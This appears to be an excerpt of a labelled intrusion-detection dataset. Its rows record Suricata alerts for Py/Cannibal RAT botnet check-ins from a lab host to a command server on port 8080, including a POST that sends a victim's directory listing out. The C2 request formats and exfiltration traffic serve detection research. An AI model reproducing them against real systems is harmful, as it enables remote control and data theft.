application/x-www-form-urlencoded\r\n\r\noutput=+Volume+in+drive+C+has+no+label.%0A+Volume+Serial+Number+is+A471-B674%0A%0A+Directory+of+C%3A%5CUsers%5Ccic4%5CDownloads%0A%0A2017-07-07++10%3A08+AM++++%3CDIR%3E++++++++++.%0A2017-07-07++10%3A08+AM++++%3CDIR%3E++++++++++..%0A2017-07-07++10%3A08+AM++++++++17%2C951%2C465+agent%281%29.exe%0A2017-07-07++10%3A06+AM++++++++17%2C951%2C465+agent.exe%0A2017-06-27++02%3A36+PM+++++++++++266%2C248+Firefox+Setup+Stub+54.0.exe%0A2017-06-27++02%3A39+PM+++++++++++738%2C368+JavaSetup8u131.exe%0A2017-06-15++10%3A08+AM++++++++++++++++79+windump+command.txt%0A2017-03-22++07%3A32+PM+++++++++++569%2C344+WinDump.exe%0A2017-03-22++07%3A22+PM+++++++++++915%2C128+WinPcap_4_1_3.exe%0A+++++++++++++++7+File%28s%29+++++38%2C392%2C097+bytes%0A+++++++++++++++2+Dir%28s%29++124%2C437%2C569%2C536+bytes+free%0A&botid=mitacs-pc4', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobjxAAIAGTuTAqAoPza6lScwLH5Aq81fJHKXjilARAQACnAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
477
attack
1,246,119
192.168.10.15-52236-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4401093, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:22:19
68,389
Friday
[{'timestamp': '2017-07-07T13:22:19.290550+0000', 'flow_id': 515445652940283, 'pcap_cnt': 4401093, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52236, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:19.222715+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobkFAAIAGTt/AqAoPza6lScwMH5AwFG6Jt8XNolARAQBhgQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:22:19.290550+0000', 'flow_id': 515445652940283, 'pcap_cnt': 4401093, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52236, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:19.222715+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobkFAAIAGTt/AqAoPza6lScwMH5AwFG6Jt8XNolARAQBhgQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
308
attack
1,246,191
192.168.10.15-52237-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4403447, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:22:29
72,543
Friday
[{'timestamp': '2017-07-07T13:22:29.357295+0000', 'flow_id': 876188546718527, 'pcap_cnt': 4403447, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52237, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:29.285503+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobkZAAIAGTtrAqAoPza6lScwNH5BZ7T3KNinKb1ARAQDtNQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:22:29.357295+0000', 'flow_id': 876188546718527, 'pcap_cnt': 4403447, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52237, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:29.285503+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobkZAAIAGTtrAqAoPza6lScwNH5BZ7T3KNinKb1ARAQDtNQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,246,289
192.168.10.15-52238-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4405349, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:22:32
72,507
Friday
[{'timestamp': '2017-07-07T13:22:32.482363+0000', 'flow_id': 1280035731817445, 'pcap_cnt': 4405349, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52238, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:32.410597+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobktAAIAGTtXAqAoPza6lScwOH5AptxIF4Xnk3FARAQCDcgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:22:32.482363+0000', 'flow_id': 1280035731817445, 'pcap_cnt': 4405349, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52238, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:32.410597+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobktAAIAGTtXAqAoPza6lScwOH5AptxIF4Xnk3FARAQCDcgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,246,331
192.168.10.15-52239-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4406308, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:22:39
76,276
Friday
[{'timestamp': '2017-07-07T13:22:39.423653+0000', 'flow_id': 1166751674879785, 'pcap_cnt': 4406308, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52239, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:39.347945+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoblBAAIAGTtDAqAoPza6lScwPH5CaUdHxo0L9DlARAQB47wAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:22:39.423653+0000', 'flow_id': 1166751674879785, 'pcap_cnt': 4406308, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52239, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:39.347945+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoblBAAIAGTtDAqAoPza6lScwPH5CaUdHxo0L9DlARAQB47wAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,246,342
192.168.10.15-52240-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4407399, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:22:49
80,066
Friday
[{'timestamp': '2017-07-07T13:22:49.890661+0000', 'flow_id': 555131152720290, 'pcap_cnt': 4407399, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52240, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:49.811426+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoblVAAIAGTsvAqAoPza6lScwQH5AImMGqwXJcDlARAQCdvwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:22:49.890661+0000', 'flow_id': 555131152720290, 'pcap_cnt': 4407399, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52240, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:22:49.811426+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAoblVAAIAGTsvAqAoPza6lScwQH5AImMGqwXJcDlARAQCdvwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,246,363
192.168.10.15-52242-205.174.165.73-8080-6
